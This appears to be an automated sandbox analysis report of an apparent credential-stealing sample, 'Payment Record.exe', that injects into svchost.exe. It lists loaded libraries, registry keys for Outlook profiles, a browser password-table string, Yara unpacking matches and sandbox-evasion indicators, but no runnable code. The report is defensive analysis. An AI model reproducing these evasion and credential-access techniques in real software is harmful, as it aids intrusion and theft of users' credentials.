Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000003.2129158378.0000000005005000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment Record.exe	ReversingLabs: Detection: 36%
Source: Payment Record.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\Payment Record.exe "C:\Users\user\Desktop\Payment Record.exe"
Source: C:\Users\user\Desktop\Payment Record.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Record.exe"
Source: C:\Users\user\Desktop\Payment Record.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Record.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment Record.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Payment Record.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: Payment Record.exe, 00000000.00000003.2127326000.0000000003980000.00000004.00001000.00020000.00000000.sdmp, Payment Record.exe, 00000000.00000003.2126483693.0000000003B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Record.exe, 00000000.00000003.2127326000.0000000003980000.00000004.00001000.00020000.00000000.sdmp, Payment Record.exe, 00000000.00000003.2126483693.0000000003B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3366251258.0000000000A71000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3366251258.0000000000A71000.00000020.00000001.01000000.00000005.sdmp

Source: Payment Record.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment Record.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment Record.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment Record.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment Record.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Record.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A4B37 LoadLibraryA,GetProcAddress,

0_2_006A4B37

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C8945 push ecx; ret	0_2_006C8958
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006ACBB2 push 00000000h; retf	0_2_006ACBB4
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006AB5E0 push 00000000h; ret	0_2_006AB5E4
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_01081EC0 push eax; ret	0_2_01081ED4
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_01081EC0 push eax; ret	0_2_01081EFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00A73360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00A73360

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_006A48D7
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00725376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00725376

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006C3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006C3187

Source: C:\Users\user\Desktop\Payment Record.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Record.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment Record.exe

API/Special instruction interceptor: Address: 10E14BC

Source: C:\Users\user\Desktop\Payment Record.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-110468

Source: C:\Users\user\Desktop\Payment Record.exe

API coverage: 4.4 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 3660

Thread sleep time: -660000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0070445A
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070C6D1 FindFirstFileW,FindClose,	0_2_0070C6D1
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0070C75C
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0070EF95
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0070F0F2
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0070F3F3
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_007037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007037EF
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00703B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00703B12
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0070BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A49A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000002.00000002.3366671040.0000000003012000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_00713F09 BlockInput,

0_2_00713F09

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_006A3B3A

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006D5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_006D5A7C

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A4B37 LoadLibraryA,GetProcAddress,

0_2_006A4B37

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_010E0108 mov eax, dword ptr fs:[00000030h]	0_2_010E0108
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0108257B mov eax, dword ptr fs:[00000030h]	0_2_0108257B
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_010E1728 mov eax, dword ptr fs:[00000030h]	0_2_010E1728
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_010E1788 mov eax, dword ptr fs:[00000030h]	0_2_010E1788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]	2_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74410 mov eax, dword ptr fs:[00000030h]	2_2_00A74410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74410 mov eax, dword ptr fs:[00000030h]	2_2_00A74410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73060 mov eax, dword ptr fs:[00000030h]	2_2_00A73060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73060 mov eax, dword ptr fs:[00000030h]	2_2_00A73060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73060 mov eax, dword ptr fs:[00000030h]	2_2_00A73060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73060 mov eax, dword ptr fs:[00000030h]	2_2_00A73060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73540 mov eax, dword ptr fs:[00000030h]	2_2_00A73540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73540 mov eax, dword ptr fs:[00000030h]	2_2_00A73540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73540 mov eax, dword ptr fs:[00000030h]	2_2_00A73540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A756A0 mov eax, dword ptr fs:[00000030h]	2_2_00A756A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A756A0 mov ecx, dword ptr fs:[00000030h]	2_2_00A756A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74610 mov eax, dword ptr fs:[00000030h]	2_2_00A74610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74610 mov eax, dword ptr fs:[00000030h]	2_2_00A74610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74610 mov eax, dword ptr fs:[00000030h]	2_2_00A74610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A74610 mov eax, dword ptr fs:[00000030h]	2_2_00A74610

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006F80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006F80A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006CA155
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CA124 SetUnhandledExceptionFilter,	0_2_006CA124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A75848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00A75848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A733C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_00A733C0

HIPS / PFW / Operating System Protection Evasion

